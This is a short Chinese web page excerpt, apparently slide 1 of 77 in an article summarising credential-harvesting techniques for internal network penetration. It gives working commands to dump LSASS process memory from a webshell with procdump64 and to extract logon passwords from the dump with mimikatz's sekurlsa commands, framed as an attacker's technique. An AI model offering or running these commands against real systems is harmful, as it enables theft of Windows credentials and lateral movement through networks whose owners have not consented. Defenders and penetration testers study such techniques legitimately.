内网渗透 | 最全的内网凭据密码搜集措施和技巧总结(1/77)

更多
2023-1-9 16:07 1193人参与 0条评论 自动播放 开灯

内网渗透 | 最全的内网凭据密码搜集措施和技巧总结

上不了线的状况下,也能够在webshell中来dump内存,保存到本地解密即可。Dump内存的工具有很多,这里我们运用procdump64.exe为例中止dump内存:procdump64.exe -accepteula -ma lsass.exe lsass.dmp 然后本地运用mimikatz中止解密:sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords full [查看原文]

上传图片 点击发表评论 (1193人参与 0条评论)